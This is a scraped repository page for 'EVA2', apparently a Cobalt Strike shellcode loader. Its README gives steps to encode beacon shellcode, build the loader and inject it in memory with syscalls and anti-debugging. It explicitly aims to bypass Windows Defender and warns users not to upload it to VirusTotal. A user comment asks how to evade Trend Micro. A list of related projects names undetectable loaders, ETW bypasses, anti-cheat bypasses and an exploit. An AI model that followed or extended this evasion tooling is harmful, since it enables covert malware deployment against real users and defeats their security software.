Another version of EVA using anti-debugging techs && using Syscalls

Overview

EVA2

Another version of EVA using anti-debugging techs && using Syscalls

First thing: Dont Upload to virus total. this note is for you and not for me. if you wanna keep this code effective, and u want to use it to bypass windows defender, DONT UPLOAD IT TO VIRUS TOTAL OR ANY OTHER WEBSITE LIKE IT, else read the note at line 11 in EVA1


REQUIREMENTS:

  • visual studio 2019 [ it may work with visual studio 2017 ]
  • cobalt strike [ take a look at my repo cobalt-wipe ]
  • python2 for the encoder

USAGE:

  • load this profile : googledrive_getonly.profile in cobaltstrike : ./teamserver <lhost> <pass> <path to googledrive_getonly.profile>
  • create your shellcode [use https] (x64 x86 wont work) using cobalt-strike [check my cobalt-wipe repo]
  • place your shellcode inside encoder.py [preferably change the keys] and run it using python2
  • after encoder.py output your encrypted shellcode copy and paste it inside EVA.cpp
  • if u want to inject to another process uncomment line 45 not recommended tho
  • build the code using visual studio 2019 - Release - x64 x86 wont work
  • enjoy

Features:

  • New Profile for the connection of the C&C of cobalt strike, the profile is from here
  • anti debugging tech
  • encoded shellcode
  • decryption & injection of the shellode happens in the memory [byte by byte] and thus, less chance to get detected
  • using syscalls

DEMO:

[+] You can do your self a favour and disable Automatic Sample Submission in windows defender:

Screenshot 2021-06-25 123639

EVA2.-.DEMO.mp4

special thanks for:


LICENSE: GNU General Public License v3.0


My Empty Ethereum Wallet (No jokes) : 0x1B4944030818392D76672f583884F4A125A4415e

120064592-a5c83480-c075-11eb-89c1-78732ecaf8d3

You might also like...
Easy Anti PatchGuard

EasyAntiPatchGuard ##Support System = Win8 (Win8 - Win10 21H4) How to use 1.Build EasyAntiPatchGuard.sln 2.Load EasyAntiPatchGuard.sys Detail as we kn

A loadlibrary injector for the game Splitgate that fully bypasses their EQU8 anti-cheat implementation.

splitgate-load-library-injector A loadlibrary injector for the game Splitgate that fully bypasses their EQU8 anti-cheat implementation. Information Th

研究和移除各种内核回调,在anti anti cheat的路上越走越远

driver_callback_bypass_1909 研究和移除各种内核回调,在anti anti cheat的路上越走越远 测试系统 全部代码运行在1909系统下(Microsoft Windows [版本 10.0.18363.592]) 更新 主要回调都绕过,分析出来自会上传,完毕后写一个专

Authors' implementation of our SIGGRAPH Asia 2021 Technical Communications (Viewport-Resolution Independent Anti-Aliased Ray Marching on Interior Faces in Cube-Map Space) demo II. Fast real-time volume rendering for an external volume texture with mesh occlusion. Open Source Cheat for Apex Legends, designed for ease of use. Made to understand reversing of Apex Legends and respawn's modified source engine as well as their Easy Anti Cheat Implementation.
Open Source Cheat for Apex Legends, designed for ease of use. Made to understand reversing of Apex Legends and respawn's modified source engine as well as their Easy Anti Cheat Implementation.

Apex-Legends-SDK Open Source Cheat for Apex Legends, designed for ease of use. Made to understand reversing of Apex Legends and respawn's modified sou

Anti-Grain Evolution. 2D graphics engine for Speed and Quality in C++.

Anti-Grain Evolution This project is based on ideas found in Maxim (mcseem) Shemanarev's Anti-Grain Geometry library, but oriented towards maximizing

Blumentals Program Protector v4.x anti protection toolkit
Blumentals Program Protector v4.x anti protection toolkit

VeNoM A Blumentals Program Protector v4.x anti protection toolkit. Reverse engineering proof-of-concept code. Screenshot & demo venomdemo.mp4 Usage Th

Make CVE-2020-0668 exploit work for version < win10 v1903 and version >= win10 v1903
Make CVE-2020-0668 exploit work for version win10 v1903 and version = win10 v1903

CVE-2020-0668 Made CVE-2020-0668 exploit work for version win10 v1903 and version = win10 v1903 Diaghub Exploit ( v1903) powershell exploit works

Yet another alarm (control) panel for Home Assistant.
Yet another alarm (control) panel for Home Assistant.

HASS-YAAP Yet another alarm (control) panel for Home Assistant. Change alarm system mode (away, home, night, disarmed) Welcome people arriving by thei

Comments
  • Code issues

    Code issues

    I tried compiling achlys and running it but was unable to get it working also the exe file had some errors compiling but was still able to generate the exe file in VC 2019

    opened by sly9it 0
  • Trend Micro Antivirus breaks the app

    Trend Micro Antivirus breaks the app

    Firstly, thank you for a great tool, I wish you success and all the best.

    Feedback

    So I compiled everything successfully. It all works if I disable antivirus, I can run it and I get the initial beacon on cobalt strike.

    Issue

    I have Trend Micro installed. When I enable it, then it crashes after saying: Running the Thread I tried changing the encryption keys, same issue. I tried renaming the exe to another name, same issue. I tried signing the exe too and adding an icon to it too, still the issue persists.

    Any advice on how to overcome this?

    Screenshot

    Issue1

    opened by honeyfairy 1
Owner
YOUR EXPLOITS ARE LIMITED ONLY BY YOUR IMAGINATION
null
EarlyBird: a poc of using the tech with syscalls on powershell.exe

EarlyBird: a poc of using the tech with syscalls on powershell.exe injecting cobalt strike shellcode to powershell.exe using EarlyBird Tech USAGE: fir

null 47 Jan 22, 2022
Undetectable Loader for Cobalt Strike Using Syscalls And A External Shellcode

Hellsgate Undetectable Loader for Cobalt Strike Using Syscalls And A External Shellcode Features: Using Syscalls from Hellsgate tech loading the shell

JUICY 21 Nov 5, 2021
A tool for detecting manual/direct syscalls in x86 and x64 processes using Nirvana Hooks.

manual-syscall-detect A tool for detecting manual/direct syscalls in x86 and x64 processes using Nirvana Hooks. Description A full write-up of this to

Conor Richard 71 Nov 17, 2022
PoC capable of detecting manual syscalls from usermode.

syscall-detect PoC capable of detecting manual syscalls from usermode. More information available at: https://winternl.com/detecting-manual-syscalls-f

null 124 Nov 25, 2022
CobaltStrike BOF - Inject ETW Bypass into Remote Process via Syscalls (HellsGate|HalosGate)

Cobalt Strike BOF - Inject ETW Bypass Inject ETW Bypass into Remote Process via Syscalls (HellsGate|HalosGate) Running InjectEtwBypass BOF from Cobalt

Bobby Cooke 235 Nov 18, 2022
CredBandit - Proof of concept Beacon Object File (BOF) that uses static x64 syscalls to perform a complete in memory dump of a process and send that back through your already existing Beacon communication channel

CredBandit CredBandit is a proof of concept Beacon Object File (BOF) that uses static x64 syscalls to perform a complete in memory dump of a process a

anthemtotheego 186 Nov 22, 2022
A utility to automate the installation, maintenance, and debugging of Asterisk/DAHDI, while integrating additional patches to provide the richest telephony experience

PhreakScript A utility to automate the installation, maintenance, and debugging of Asterisk/DAHDI, while integrating additional patches to provide the

null 12 Nov 13, 2022
Emulates the VirusTotal vt YARA module for livehunt rule debugging/testing

This YARA module implements the same interface as the VirusTotal vt YARA module, making it possible to test livehunt rules against local files outside of a livehunt context.

null 18 Aug 8, 2022
Modified version of srlua for MSVC using version 5.4 of Lua

Modified version of srlua for MSVC using version 5.4 of Lua. Quote from the original README: This is a self-running Lua interpreter. It is meant to be

Augusto Goulart 3 Nov 24, 2022
Official Vanguard Anti-Cheat source code.

Vanguard Official Vanguard Anti-Cheat source code. Using the compiled binary For ease, an unprotected compiled version of Vanguard is available. Downl

Riot Vanguard 432 Nov 17, 2022